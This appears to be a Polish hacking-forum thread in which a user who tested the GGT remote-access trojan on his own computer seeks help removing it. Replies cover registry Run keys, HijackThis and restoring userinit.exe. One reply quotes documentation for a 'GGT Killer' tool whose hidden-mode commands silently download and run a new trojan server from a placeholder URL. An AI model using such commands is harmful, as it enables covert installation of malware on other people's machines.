Pomocy GGT system sie wali oO

[Kaffior]

Testowalem ggt na swoim kompie. Skonczlem i wpisalem end uninstall. zrobilem reset, i kasperski znalazl 36 trojanow. To te same, ale w plikach userinit.exe smss.exe svchost.exe i innych systemowych... I kazdy z nim korzysta z kernel32v.dll

jak proboje zamknac plik, z ctrl+alt+del, to dostaje crash systemu, niebieski ekran. Jak programem procexp proboje odlaczyc ten plik kernel32v.dlll od reszty, to znowu crash. Jak sie tego pozbyc? tego backdoora z ggt ?

 

[3boot]

Uzyj GGT Killer'a :twisted:
http://wojass.net/download/ggtkiller.rar

 GGT KILLER 2.x



GGT Killer służy do usuwania lub aktualizowania G@du-Ghost Trojan v.2.1. Jeśli serwer GGT został uruchomiony z jakąkolwiek opcja z ramki "Stealth" (w MISC) , to pełne usunięcie GGT wymaga ponownego uruchomienia komputera. GGT Killer informuje o tym.

Program można uruchomić na 2 sposoby:

- normalnie, bez parametrów. Jest to tryb widoczny z GUI, bardzo prosty w obsłudze.

- z parametrami, tryb niewidoczny, np.:



„ggt_killer.exe hide” - proste niewidoczne usuwanie , nie uruchamia ponownie komputera nawet jeśli jest to wymagane do pełnego usunięcia GGT. Użytkownik musi ręcznie ponownie uruchomić system.



„ggt_killer.exe reboot” – usuwa GGT i wymusza restart komputera, jeśli jest to konieczne.



„ggt_killer.exe hide [url]http://www.mojastrona.com/nowyserwer.exe”[/url] - tak samo jak wyżej z parametrem „hide” ale dodatkowo ściągą z Internetu i uruchamia nowy serwer *.EXE. Jeśli usunięcie GGT wymaga restartu systemu to nowy serwer zostanie uruchomiony dopiero po restarcie.



„ggt_killer.exe reboot [url]http://www.mojastrona.com/nowyserwer.exe”[/url] - usuwa GGT, ściąga i uruchamia nowy serwer *.EXE. Jeśli to konieczne wymuszany jest restart systemu i ściągnięty plik jest uruchamiany również po restarcie systemu.



„ggt_killer.exe download [url]http://www.mojastrona.com/dowolny.exe”[/url] – nie usuwa GGT tylko ściąga i uruchamia plik z Internetu.

 

[Kaffior]

'nie znaleziono ggt v.2.x' : / o co moze chodzic ?

 

[3boot]

Ciekawe...

Podaj log z HijackThis'a

1. Ściągnij program

2. Wybierz opcje Do a system scan and save a logfile

3. Raport wklej tutaj. 



[url]http://www.haker.com.pl/forum/viewtopic.php?t=17673[/url]

Mozesz jeszcze sprobowac zeskanowac komputer programami:
Spybot - Search & Destroy & Ad-Aware (Spolszczenie)
oraz skanerem Online: [Panda ActiveScan]

http://www.pandasoftware.com/activescan/pol/activescan_principal.htm

PS:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunonce
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx

W ktoryms z tych wierszy powinien byc odnosnik do Twojego serwera

Znajdz go i usun :twisted:

 

[Kaffior]

Nie ma do servera. sa tylko dl USERINIT.exe a zaznaczlem aby podmienial userinit...

 

[3boot]

Dosteles Odp.

http://www.haker.com.pl/forum/viewtopic.php?p=110140#110140

Sewer GGT:
O4 - HKLM..Run: [NT598307] C:WINDOWSsystem32userinit.exe

Serwer Danton'a:
O4 - HKLM..Run: [D0D7A3821] C:WINDOWSsystem32DantonS 4.3.0. alpha.exe

 

[Kaffior]

zrobilem to troszku inaczej. Tam byl ten plik dll. Ten kernel23 (albo 32 nie pamietam juz)v.dll...
i nie dalo sie og wyjebac, a konczac jakis proces byl crash.. otworzylem tryb awaryjny + cmd i wyjebalem go łopatologicznie lol.
Nawet nie protestowal ze chce go wywalic. Poprzednio wpisalem na stronke, i mi pokazal co mam wywalic. Wywalilem to ale szczerze to nie pomoglo

Wpisow w rejestrzenie bylo, a ad aware przeskanowal calego kompa, dodal 50 plikow do kwarantanny (40 plikow to cookies, a reszta to wpisy w rejestrze ).. Puszcze teraz pelny skan c: d: e: i zobaczymy. Nic nie powinien znalesc..
Rada dla innych: Jak zrobicie server ktory ma robic wpisy w rejestrze + podmieniac pliki to NIE uruchamiajcie u siebie ich : D

ps. Moj kolega jest w trakcie formatu i mowil ze jestem (auto cenzura) : )
Nie moze sie zalogowac. Loguje sie i zaraz relog. CHyba ten userinit jest odpowiedzialny za logowanie sie... rada bylo by go podmienienie z dos'u ale tego nie umiem :/

Hm... 10% skanu

 

[Kaffior]

2 virusy zostaly : ( ale to 2 moje: ) 1. server nie uruchumiony i 2 kreator ^^
dzieki mimowszystko

 

[Wojass]

domyslam sie ze uzyles v2.3
wystarczylo wpisac "uninstall" zamiast "end uninstall" i zrobic reboot
jezeli uzyles podmiany z userinit.exe i na wlasna reke usuwasz ggt to niezbedne jest przywrocenie oryginalnego userinit.exe bez tego sie nie zalogujesz do win